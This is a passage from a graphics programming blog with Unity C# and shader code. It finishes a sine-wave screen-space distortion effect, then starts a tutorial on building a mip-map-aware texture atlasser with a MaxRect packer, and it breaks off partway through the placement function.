<p>The entire source for the composite fragment function is as follows:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">screen</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="nf">float2</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">x</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">y</span><span class="p">));</span>
<span class="n">float2</span> <span class="n">distortUVs</span> <span class="p">=</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">;</span>
<span class="cp">#if defined(UNITY_UV_STARTS_AT_TOP) && !defined(SHADER_API_MOBILE)
</span> <span class="n">distortUVs</span><span class="p">.</span><span class="n">y</span> <span class="p">=</span> <span class="m">1.0</span> <span class="p">-</span> <span class="n">distortUVs</span><span class="p">.</span><span class="n">y</span><span class="p">;</span>
<span class="cp">#endif
</span>
<span class="n">float4</span> <span class="n">distort</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_DistortionRT</span><span class="p">,</span> <span class="nf">fixed2</span><span class="p">(</span><span class="n">distortUVs</span><span class="p">.</span><span class="n">x</span> <span class="p">+</span> <span class="nf">sin</span><span class="p">((</span><span class="n">distortUVs</span><span class="p">.</span><span class="n">y</span> <span class="p">+</span> <span class="n">_DistortionOffset</span><span class="p">)</span> <span class="p">*</span> <span class="m">100</span><span class="p">)*</span><span class="n">_DistortionAmount</span><span class="p">,</span> <span class="n">distortUVs</span><span class="p">.</span><span class="n">y</span><span class="p">));</span>
<span class="kt">float</span> <span class="n">d</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_CameraDepthTexture</span><span class="p">,</span> <span class="n">distortUVs</span><span class="p">).</span><span class="n">r</span><span class="p">;</span>
<span class="cp">#if UNITY_REVERSED_Z
</span> <span class="k">return</span> <span class="nf">lerp</span><span class="p">(</span><span class="n">screen</span><span class="p">,</span> <span class="n">distort</span><span class="p">,</span> <span class="n">distort</span><span class="p">.</span><span class="n">a</span> <span class="p">></span> <span class="n">d</span><span class="p">);</span>
<span class="cp">#else
</span> <span class="k">return</span> <span class="nf">lerp</span><span class="p">(</span><span class="n">screen</span><span class="p">,</span> <span class="n">distort</span><span class="p">,</span> <span class="n">distort</span><span class="p">.</span><span class="n">a</span> <span class="p"><</span> <span class="n">d</span><span class="p">);</span>
<span class="cp">#endif
</span><span class="p">}</span></code></pre></figure>
<p>All we need to do now is add the final blit to the effect script, which makes the completed OnRenderImage function look like so:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">private</span> <span class="k">void</span> <span class="nf">OnRenderImage</span><span class="p">(</span><span class="n">RenderTexture</span> <span class="n">src</span><span class="p">,</span> <span class="n">RenderTexture</span> <span class="n">dst</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">RenderTexture</span> <span class="n">distortingRT</span> <span class="p">=</span> <span class="n">RenderTexture</span><span class="p">.</span><span class="nf">GetTemporary</span><span class="p">(</span><span class="n">scaledWidth</span><span class="p">,</span> <span class="n">scaledHeight</span><span class="p">,</span> <span class="m">24</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">ARGBFloat</span><span class="p">);</span>
<span class="n">Graphics</span><span class="p">.</span><span class="nf">Blit</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">distortingRT</span><span class="p">,</span> <span class="n">stripAlphaMat</span><span class="p">);</span>
<span class="n">maskCam</span><span class="p">.</span><span class="nf">CopyFrom</span><span class="p">(</span><span class="n">cam</span><span class="p">);</span>
<span class="n">maskCam</span><span class="p">.</span><span class="n">gameObject</span><span class="p">.</span><span class="n">transform</span><span class="p">.</span><span class="n">position</span> <span class="p">=</span> <span class="n">transform</span><span class="p">.</span><span class="n">position</span><span class="p">;</span>
<span class="n">maskCam</span><span class="p">.</span><span class="n">gameObject</span><span class="p">.</span><span class="n">transform</span><span class="p">.</span><span class="n">rotation</span> <span class="p">=</span> <span class="n">transform</span><span class="p">.</span><span class="n">rotation</span><span class="p">;</span>
<span class="c1">//draw the distorting objects into the buffer</span>
<span class="n">maskCam</span><span class="p">.</span><span class="n">clearFlags</span> <span class="p">=</span> <span class="n">CameraClearFlags</span><span class="p">.</span><span class="n">Depth</span><span class="p">;</span>
<span class="n">maskCam</span><span class="p">.</span><span class="n">cullingMask</span> <span class="p">=</span> <span class="m">1</span> <span class="p"><<</span> <span class="n">LayerMask</span><span class="p">.</span><span class="nf">NameToLayer</span><span class="p">(</span><span class="s">"Distortion"</span><span class="p">);</span>
<span class="n">maskCam</span><span class="p">.</span><span class="nf">SetTargetBuffers</span><span class="p">(</span><span class="n">distortingRT</span><span class="p">.</span><span class="n">colorBuffer</span><span class="p">,</span> <span class="n">distortingRT</span><span class="p">.</span><span class="n">depthBuffer</span><span class="p">);</span>
<span class="n">maskCam</span><span class="p">.</span><span class="nf">Render</span><span class="p">();</span>
<span class="c1">//Composite pass</span>
<span class="n">compositeMat</span><span class="p">.</span><span class="nf">SetTexture</span><span class="p">(</span><span class="s">"_DistortionRT"</span><span class="p">,</span> <span class="n">distortingRT</span><span class="p">);</span>
<span class="n">Graphics</span><span class="p">.</span><span class="nf">Blit</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="p">,</span> <span class="n">compositeMat</span><span class="p">);</span>
<span class="n">RenderTexture</span><span class="p">.</span><span class="nf">ReleaseTemporary</span><span class="p">(</span><span class="n">distortingRT</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<h3>Performance Thoughts, Other Considerations</h3>
<p>So now we should have a working effect! If you’re lost with implementing any part of this, or were just too lazy to do it yourself, all the code for the effect is available on github <a href="https://github.com/khalladay/SinewaveShapeDistortion">here</a>.</p>
<p>All that’s left to do is talk about some leftover details that didn’t fit anywhere else, and performance. Luckily the performance talk is short - this is a pretty lightweight effect. With a scale factor of 0.5 (so the distortion buffer is half the resolution of the main camera’s), my iPhone eats this for breakfast. This will of course become more expensive the bigger your distortion buffer is, but on such a small screen you can probably get away with a half res buffer.</p>
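<p>To put a rough number on how the cost scales with that factor, here’s a minimal sketch in plain C# (no Unity types). The DistortionBufferSize class and its method names are made up for illustration, and the truncating cast is only an assumption about how scaledWidth and scaledHeight might be derived, not necessarily what the project on github does.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#">using System;

// Hypothetical helper, not part of the original effect script.
public static class DistortionBufferSize
{
    // Scales one dimension of the main camera's resolution,
    // never going below a single pixel.
    public static int Scale(int fullRes, float scaleFactor)
    {
        return Math.Max(1, (int)(fullRes * scaleFactor));
    }

    // Number of pixels in the scaled buffer, which is what the
    // mask camera and the blits have to fill every frame.
    public static int PixelCount(int width, int height, float scaleFactor)
    {
        return Scale(width, scaleFactor) * Scale(height, scaleFactor);
    }
}</code></pre></figure>
<p>For a 1920x1080 camera, a scale factor of 0.5 gives a 960x540 buffer, which is 518,400 pixels instead of 2,073,600. Halving the scale factor leaves a quarter of the pixels to fill, because it applies to both dimensions.</p>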
<p>And if my phone can run this… I think it goes without saying that both my laptops barely noticed this effect. I don’t have numbers because everything ran this at 60 fps and I really didn’t care to spend my weekend trying to get any more granular than that.</p>
<p>The other thing to mention is what could be done to make this effect better! The sine wave distortion is fairly cheesy, but you could likely extend this to handle more interesting distortion patterns if you took a few concepts from my <a href="http://kylehalladay.com/blog/tutorial/2016/01/15/Screen-Space-Distortion.html">other post on screen space distortion</a>.</p>
<p>Also, since this is all in screen space, objects that are farther away from the camera appear to be distorting at a higher magnitude than objects closer to your camera. You could probably account for this by scaling the distortion magnitude based on the distorting object’s depth, but I haven’t tried this out yet.</p>
<p>That’s all for now, shoot me a message <a href="https://twitter.com/khalladay">on Twitter</a> if you have any questions or are doing something with this effect :)</p>
Minimizing Mip Map Artifacts In Atlassed Textures2016-11-04T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2016/11/04/Texture-Atlassing-With-Mips<p>Since all my professional work is on mobile games, I spend a LOT of time working on tools and systems that can squeeze as much performance out of low powered hardware as possible. Perhaps unsurprisingly, one of these tools is texture atlassing, that is, packing multiple textures into a larger image, which ends up looking something like this:</p>
<div align="center">
<img src="/images/post_images/2016-10-11/exampleatlas.png" />
<br />
<br />
</div>
<p>That Texture Atlassing is a good idea isn’t really news, and I’m not here to sell you on the benefits of doing it (although if I were, I’d mention things like fewer texture state changes, improved batching, lower memory usage, and the ability to use NPOT textures on ES2 hardware). What I am here to do is walk through how to build a good one.</p>
<p>There are a lot of tutorials and texture atlassing options out there already, but they all seem targeted at people making 2D games or using them for UI. While these are perfectly good use cases, they often ignore one of the harder problems when you’re working with Texture Atlasses: mip mapping. If you’ve ever atlassed a 3D scene (which is a very VERY good idea on mobile), you’ve probably noticed some ugly texture seams when your camera pulls back:</p>
<div align="center">
<img src="/images/post_images/2016-10-11/badmips.png" />
<font size="1">(I didn't use the atlas in the first picture to make this one)</font><br />
<br />
</div>
<p>This is what it looks like when your texture atlasser isn’t built to handle mip mapping. Notice how, in the distance, weird colours (from an adjacent sprite in my atlas) start to pollute the appearance of our texture. Again, not applicable to UI or 2D things, but very applicable to what I do (3D), so today I thought I’d go over how to write a texture atlasser that does solve these problems.</p>
<h2 id="brief-aside-what-is-mip-mapping">Brief Aside: What is Mip Mapping</h2>
<p>Mip Mapping is a rendering technique which creates lower resolution versions of a texture, and swaps to these lower resolution textures based on how far away an object is from the camera. This is done both to increase rendering speed, and to improve rendering quality. Without mip mapping, as textures get farther away, they tend to start “shimmering”, which looks really unnatural. With mip mapping, the renderer switches to a lower resolution (and essentially pre-antialiased) version of the texture, which eliminates this shimmer:
<br /></p>
<div align="center">
<img align="left" src="/images/post_images/2016-10-11/nomipsshort.gif" /><img align="right" src="/images/post_images/2016-10-11/mipsshort.gif" />
<br />
<br />
<br /><br />
<br />
<br /><br />
<br />
<br /><br />
</div>
<p><br /></p>
<p>If you’re using Unity, you’ve almost certainly been using mip maps the whole time without knowing it (although you may have wondered why the size of your images in memory was larger than you thought), and in most cases you never have to think about mip mapping at all. With texture atlassing, you do, and this is because mip maps are usually generated by taking the original image, and shrinking it by halving both dimensions of the texture. This is done multiple times, so a 512x512 texture will have mips with a width and height of 256, 128, 64, 32, etc. This shrinking is most often done using a simple Bilinear Filter, which essentially averages a bunch of pixels in the high resolution image to determine what colour a pixel is in a lower resolution version.</p>
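<p>As a quick sanity check on those numbers, here’s a small sketch in plain C# (it uses C# 7 tuples and no Unity types) that lists the size of every level in a full mip chain and adds up the texels. The MipChain class is made up for this example, and it assumes the chain runs all the way down to 1x1.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#">using System;
using System.Collections.Generic;

// Hypothetical helper for illustration only.
public static class MipChain
{
    // Returns the (width, height) of every mip level, starting with the
    // full size texture (level 0) and halving until both dimensions are 1.
    public static List&lt;(int width, int height)&gt; Sizes(int width, int height)
    {
        var levels = new List&lt;(int width, int height)&gt;();
        while (true)
        {
            levels.Add((width, height));
            if (width == 1 &amp;&amp; height == 1) break;
            width = Math.Max(1, width / 2);
            height = Math.Max(1, height / 2);
        }
        return levels;
    }

    // Total texel count across the whole chain.
    public static long TotalTexels(int width, int height)
    {
        long total = 0;
        foreach (var level in Sizes(width, height))
            total += (long)level.width * level.height;
        return total;
    }
}</code></pre></figure>
<p>For a 512x512 texture this gives 10 levels and 349,525 texels in total, versus 262,144 for the base image on its own. That extra third or so is why a mip mapped texture takes up more memory than its dimensions suggest.</p>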
<p>In most cases, this is great, but in a texture atlas, this can lead to the edges of individual textures getting mixed with neighboring textures when the mips are generated. In extreme cases (like pictured above), the edges of a really bright texture can pick up dark colours and look very different from what’s intended. There are lots of ways to mitigate this in a texture atlasser, but I’ve yet to find a texture atlasser out there that does any of them by default, so today we’re going to build one that does.</p>
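<p>To see that mixing happen on a tiny scale, here’s a minimal sketch in plain C# (no Unity required). It treats one row of an atlas as grayscale values and halves it by averaging neighbouring pairs, which is the 1D version of averaging 2x2 blocks. The MipBleed class and its Downsample function are invented for this illustration, and a real mip generator may well use a different filter.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#">// Hypothetical helper for illustration only.
public static class MipBleed
{
    // Builds the next mip level of a single row of grayscale texels by
    // averaging each adjacent pair. Assumes the row length is even.
    public static float[] Downsample(float[] row)
    {
        float[] half = new float[row.Length / 2];
        for (int i = 0; i &lt; half.Length; ++i)
        {
            half[i] = (row[2 * i] + row[2 * i + 1]) * 0.5f;
        }
        return half;
    }
}</code></pre></figure>
<p>Feeding it the row 1, 1, 1, 0, 0, 0, 0, 0 (a 3 texel wide white texture packed next to a 5 texel wide black one) produces 1, 0.5, 0, 0. That 0.5 texel is the seam: it belongs to neither texture, and anything sampling the edge of the white texture at that mip level will pick up some of its neighbour’s black.</p>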
<h2 id="how-a-texture-atlasser-works">How A Texture Atlasser Works</h2>
<p>At a high level, a texture atlasser consists of two parts, which I’ve assigned super unofficial names:</p>
<ul>
<li>A Texture Packer, which determines where to put each texture in the atlas</li>
<li>A Blitter, which uses the UV rectangles generated by the Texture Packer to draw textures into the output atlas texture.</li>
</ul>
<p>The Texture Packer is a pretty universal component. We’re going to walk through building one for completeness’ sake, but the real meat here is what we do in the Blitter to help our mip maps.</p>
<h2 id="how-to-build-a-texture-packer">How to Build a Texture Packer</h2>
<p>Since it’s the first step in the process, let’s tackle the packer first. I’m going to write all the code in Unity because then I can piggy back on all their systems and keep the amount of code in this article manageable, but the core concepts are applicable anywhere. It’s worth noting that there isn’t really anything special about this texture packing implementation, we’ll get to the real meat of what I want to talk about in the Blitter section.</p>
<h3 id="the-output-struct">The Output Struct</h3>
<p>Speaking of core concepts, let’s talk about what our Texture Packer is going to output.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="k">struct</span> <span class="nc">AtlasLayout</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">width</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">height</span><span class="p">;</span>
<span class="k">public</span> <span class="n">List</span><span class="o"><</span><span class="n">Texture2D</span><span class="o">></span> <span class="n">textures</span><span class="p">;</span>
<span class="k">public</span> <span class="n">List</span><span class="o"><</span><span class="n">Rect</span><span class="o">></span> <span class="n">rects</span><span class="p">;</span>
<span class="k">public</span> <span class="n">AtlasLayout</span><span class="p">(</span><span class="kt">int</span> <span class="n">w</span><span class="p">,</span> <span class="kt">int</span> <span class="n">h</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">width</span> <span class="o">=</span> <span class="n">w</span><span class="p">;</span>
<span class="n">height</span> <span class="o">=</span> <span class="n">h</span><span class="p">;</span>
<span class="n">textures</span> <span class="o">=</span> <span class="k">new</span> <span class="n">List</span><span class="o"><</span><span class="n">Texture2D</span><span class="o">></span><span class="p">();</span>
<span class="n">rects</span> <span class="o">=</span> <span class="k">new</span> <span class="n">List</span><span class="o"><</span><span class="n">Rect</span><span class="o">></span><span class="p">();</span>
<span class="p">}</span>
<span class="p">};</span></code></pre></figure>
<p>The reason we need to output all this data is to handle cases where we want to return a list of AtlasLayouts instead of a single one, which we might want to do if we have a lot of textures to atlas, but our hardware limits us to a max of 2048x2048 textures (like some mobile phones). In the interest of brevity, I’m not going to handle multiple atlasses in this article, but I still feel like having a defined output struct makes things cleaner.</p>
<p>So now we have our output set up, let’s start fitting rectangles into other rectangles, shall we? There are lots of algorithms for doing this (many are described in detail <a href="http://clb.demon.fi/projects/more-rectangle-bin-packing">here</a>), but the one I like best is the MaxRect algorithm.</p>
<h3 id="the-packtextures-function">The PackTextures Function</h3>
<p>The algorithm works by defining a list of “Free Rectangles”, that is, a list of empty rectangles in the target atlas texture. Before the first texture is packed, our list of Free rectangles will contain a single element which has position (0,0) and is the size of the atlas. I’m going to start putting this initial setup into our PackTextures function, which will be the publicly exposed function we call when we want to kick off the TexturePacker.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="k">static</span> <span class="n">AtlasLayout</span> <span class="nf">PackTextures</span><span class="p">(</span><span class="n">Texture2D</span><span class="p">[]</span> <span class="n">textures</span><span class="p">,</span> <span class="kt">int</span> <span class="n">maxWidth</span><span class="p">,</span> <span class="kt">int</span> <span class="n">maxHeight</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">AtlasLayout</span> <span class="n">results</span> <span class="o">=</span> <span class="k">new</span> <span class="n">AtlasLayout</span><span class="p">(</span><span class="n">maxWidth</span><span class="p">,</span> <span class="n">maxHeight</span><span class="p">);</span>
<span class="n">List</span><span class="o"><</span><span class="n">Rect</span><span class="o">></span> <span class="n">freeRects</span> <span class="o">=</span> <span class="k">new</span> <span class="n">List</span><span class="o"><</span><span class="n">Rect</span><span class="o">></span><span class="p">();</span>
<span class="n">List</span><span class="o"><</span><span class="n">Texture2D</span><span class="o">></span> <span class="n">texturesToPlace</span> <span class="o">=</span> <span class="k">new</span> <span class="n">List</span><span class="o"><</span><span class="n">Texture2D</span><span class="o">></span><span class="p">(</span><span class="n">textures</span><span class="p">);</span>
<span class="n">texturesToPlace</span> <span class="o">=</span> <span class="n">texturesToPlace</span><span class="p">.</span><span class="n">OrderByDescending</span><span class="p">(</span> <span class="n">x</span> <span class="o">=></span> <span class="n">x</span><span class="p">.</span><span class="n">width</span> <span class="o">*</span> <span class="n">x</span><span class="p">.</span><span class="n">height</span><span class="p">).</span><span class="n">ToList</span><span class="p">();</span>
<span class="n">freeRects</span><span class="p">.</span><span class="n">Add</span><span class="p">(</span><span class="k">new</span> <span class="n">Rect</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="n">maxWidth</span><span class="p">,</span> <span class="n">maxHeight</span><span class="p">));</span>
<span class="p">...</span></code></pre></figure>
<p>You’ll notice that I’m also sorting our input textures. This is to make sure that we try to place the larger textures first, since they’re the hardest ones to find space for in an atlas. LINQ is awful for runtime performance, but for a build-time tool like our atlasser, it makes our lives a lot easier (and my blog post a lot shorter).</p>
<p>Now we need to start placing textures into the area defined by our free list. To figure out where to place a texture, we’re going to call our FindIdealRect function. This function is going to return two score values to us, along with the candidate rectangle that it finds.</p>
<p>We’re going to call FindIdealRect on every texture that we have to place, and only actually Insert the rectangle which has the best score. Then we’ll remove that texture from the list and do the whole process again.</p>
<p>In code, that looks like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="p">...</span>
<span class="k">while</span> <span class="p">(</span><span class="n">texturesToPlace</span><span class="p">.</span><span class="n">Count</span> <span class="o">></span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">bestShortSideScore</span> <span class="o">=</span> <span class="kt">int</span><span class="p">.</span><span class="n">MaxValue</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">bestLongSideScore</span> <span class="o">=</span> <span class="kt">int</span><span class="p">.</span><span class="n">MaxValue</span><span class="p">;</span>
<span class="n">Texture2D</span> <span class="n">bestTex</span> <span class="o">=</span> <span class="n">texturesToPlace</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">Rect</span> <span class="n">bestRect</span> <span class="o">=</span> <span class="k">new</span> <span class="n">Rect</span><span class="p">();</span>
<span class="n">foreach</span><span class="p">(</span><span class="n">Texture2D</span> <span class="n">curTex</span> <span class="n">in</span> <span class="n">texturesToPlace</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">shortSideScore</span> <span class="o">=</span> <span class="kt">int</span><span class="p">.</span><span class="n">MaxValue</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">longSideScore</span> <span class="o">=</span> <span class="kt">int</span><span class="p">.</span><span class="n">MaxValue</span><span class="p">;</span>
<span class="n">Rect</span> <span class="n">target</span> <span class="o">=</span> <span class="n">FindIdealRect</span><span class="p">(</span><span class="n">curTex</span><span class="p">.</span><span class="n">width</span><span class="p">,</span>
<span class="n">curTex</span><span class="p">.</span><span class="n">height</span><span class="p">,</span>
<span class="n">freeRects</span><span class="p">,</span>
<span class="n">ref</span> <span class="n">shortSideScore</span><span class="p">,</span>
<span class="n">ref</span> <span class="n">longSideScore</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">shortSideScore</span> <span class="o"><</span> <span class="n">bestShortSideScore</span>
<span class="o">||</span> <span class="p">(</span><span class="n">shortSideScore</span> <span class="o">==</span> <span class="n">bestShortSideScore</span> <span class="o">&&</span> <span class="n">longSideScore</span> <span class="o"><</span> <span class="n">bestLongSideScore</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">bestShortSideScore</span> <span class="o">=</span> <span class="n">shortSideScore</span><span class="p">;</span>
<span class="n">bestLongSideScore</span> <span class="o">=</span> <span class="n">longSideScore</span><span class="p">;</span>
<span class="n">bestTex</span> <span class="o">=</span> <span class="n">curTex</span><span class="p">;</span>
<span class="n">bestRect</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">bestRect</span><span class="p">.</span><span class="n">width</span> <span class="o">></span> <span class="mi">0</span> <span class="o">&&</span> <span class="n">bestRect</span><span class="p">.</span><span class="n">height</span> <span class="o">></span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">RemoveRectFromFreeList</span><span class="p">(</span><span class="n">bestRect</span><span class="p">,</span> <span class="n">freeRects</span><span class="p">);</span>
<span class="n">results</span><span class="p">.</span><span class="n">textures</span><span class="p">.</span><span class="n">Add</span><span class="p">(</span><span class="n">bestTex</span><span class="p">);</span>
<span class="n">results</span><span class="p">.</span><span class="n">rects</span><span class="p">.</span><span class="n">Add</span><span class="p">(</span><span class="n">bestRect</span><span class="p">);</span>
<span class="n">texturesToPlace</span><span class="p">.</span><span class="n">Remove</span><span class="p">(</span><span class="n">bestTex</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">break</span><span class="p">;</span> <span class="c1">//no room left</span>
<span class="p">}</span>
<span class="k">return</span> <span class="n">results</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Notice that the scores I was talking about above are named shortSideScore and longSideScore in this code example. The results object we add textures/rectangles to is the AtlasLayout struct we’re going to return. Then we exit the function by returning that struct. In the example above, if we run out of space in the atlas, the packer simply exits early.</p>
<p>In a production system, you’ll want to do something more intelligent than this, but what you do is dependent on your project. For example, I worked on a game with very strict memory budgets for our environment artists. The atlas for an environment couldn’t exceed 1024x1024, so if we went over, the atlasser would expand the target atlas to a size big enough for the textures to fit, but return an error. This allowed the artists to visualize what was exceeding the atlas bounds, but still prevented overly large atlasses from entering production.</p>
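<p>As a rough idea of what that kind of fallback could look like, here’s a sketch in plain C#. Everything in it is hypothetical: the AtlasBudget class, the tryPack callback (standing in for “run the packer at this size and tell me whether everything fit”), and the choice to grow by doubling are all assumptions made for the example, not a description of the production tool.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#">using System;

// Hypothetical helper for illustration only.
public static class AtlasBudget
{
    // Starts at the budgeted (square) atlas size and keeps doubling until
    // tryPack reports success. overBudget tells the caller that the result
    // is bigger than allowed and should be reported as an error.
    public static int GrowUntilPacked(int budgetSize, int hardLimit,
                                      Func&lt;int, bool&gt; tryPack, out bool overBudget)
    {
        int size = budgetSize;
        overBudget = false;
        while (!tryPack(size))
        {
            overBudget = true;
            if (size * 2 &gt; hardLimit)
            {
                throw new InvalidOperationException(
                    "Textures do not fit even at the hard limit.");
            }
            size *= 2;
        }
        return size;
    }
}</code></pre></figure>
<p>With a budget of 1024 and a set of textures that only fits at 2048, this returns 2048 with overBudget set to true, so the tool can still show the oversized atlas while refusing to ship it.</p>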
<p>Next, it’s time to add some actual texture packing logic to it. To do that we need to flesh out two functions that you may have noticed above:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">private</span> <span class="k">static</span> <span class="n">Rect</span> <span class="nf">FindIdealRect</span><span class="p">(</span><span class="kt">int</span> <span class="n">width</span><span class="p">,</span> <span class="kt">int</span> <span class="n">height</span><span class="p">,</span> <span class="n">List</span><span class="o"><</span><span class="n">Rect</span><span class="o">></span> <span class="n">freeRects</span><span class="p">,</span>
<span class="n">ref</span> <span class="kt">int</span> <span class="n">bestShortSideFit</span><span class="p">,</span> <span class="n">ref</span> <span class="kt">int</span> <span class="n">bestLongSideFit</span><span class="p">);</span>
<span class="k">private</span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">RemoveRectFromFreeList</span><span class="p">(</span><span class="n">Rect</span> <span class="n">rectToRemove</span><span class="p">,</span> <span class="n">List</span><span class="o"><</span><span class="n">Rect</span><span class="o">></span> <span class="n">freeRects</span><span class="p">);</span></code></pre></figure>
<h3 id="the-placement-function">The Placement Function</h3>
<p>The Placement Function is where we’re going to actually find a rectangle in the atlas to assign to a texture. There are lots of ways to pick a rectangle out of the free list, but the heuristic I’m going to use is the “Short Side Fit” heuristic. This means that we are going to try to find a free rectangle which has the least amount of remaining space along one dimension. This sounds much more abstract than it looks in code, don’t worry.</p>
<p>So that we have a bit of context, let’s start this section by taking a look at what this function looks like <em>without</em> the finding/scoring logic.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">private</span> <span class="k">static</span> <span class="n">Rect</span> <span class="nf">FindIdealRect</span><span class="p">(</span><span class="kt">int</span> <span class="n">width</span><span class="p">,</span>
<span class="kt">int</span> <span class="n">height</span><span class="p">,</span>
<span class="n">List</span><span class="o"><</span><span class="n">Rect</span><span class="o">></span> <span class="n">freeRects</span><span class="p">,</span>
<span class="n">ref</span> <span class="kt">int</span> <span class="n">bestShortSideFit</span><span class="p">,</span>
<span class="n">ref</span> <span class="kt">int</span> <span class="n">bestLongSideFit</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Rect</span> <span class="n">bestNode</span> <span class="o">=</span> <span class="k">new</span> <span class="n">Rect</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">freeRects</span><span class="p">.</span><span class="n">Count</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">freeRects</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">width</span> <span class="o">>=</span> <span class="n">width</span> <span class="o">&&</span> <span class="n">freeRects</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">height</span> <span class="o">>=</span> <span class="n">height</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">// score the rect here</span>
<span class="c1">// if score is the best, replace bestNode with this rect,</span>
<span class="c1">// and set bestShortSideFit and bestLongSideFit to new</span>
<span class="c1">// values</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="n">bestNode</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>As you can see, there really isn’t too much to talk about here, it’s just easier to think about the next part when you know how it all fits together.</p>
<p>Let’s look at the scoring code next. Remember all we care about is how much space is left over in the freeRectangle once we place our texture rect into it:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="c1">//score the rect here</span>
<span class="kt">int</span> <span class="n">remainingX</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)(</span><span class="n">freeRects</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">width</span> <span class="o">-</span> <span class="n">width</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">remainingY</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)(</span><span class="n">freeRects</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">height</span> <span class="o">-</span> <span class="n">height</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">shortSideFit</span> <span class="o">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="n">Min</span><span class="p">(</span><span class="n">remainingX</span><span class="p">,</span> <span class="n">remainingY</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">longSideFit</span> <span class="o">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="n">Max</span><span class="p">(</span><span class="n">remainingX</span><span class="p">,</span> <span class="n">remainingY</span><span class="p">);</span>
<span class="c1">// if score is the best...</span></code></pre></figure>
<p>Once we know our score values, all that’s left is to see if these are the best scores we have, and do something if they are:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="c1">// if score is the best, replace bestNode with this rect,</span>
<span class="c1">// and set bestShortSideFit and bestLongSideFit to new</span>
<span class="c1">// values</span>
<span class="k">if</span> <span class="p">(</span><span class="n">shortSideFit</span> <span class="o"><</span> <span class="n">bestShortSideFit</span> <span class="o">||</span>
<span class="p">(</span><span class="n">shortSideFit</span> <span class="o">==</span> <span class="n">bestShortSideFit</span> <span class="o">&&</span> <span class="n">longSideFit</span> <span class="o"><</span> <span class="n">bestLongSideFit</span><span class="p">))</span>
<span class="p">{</span>
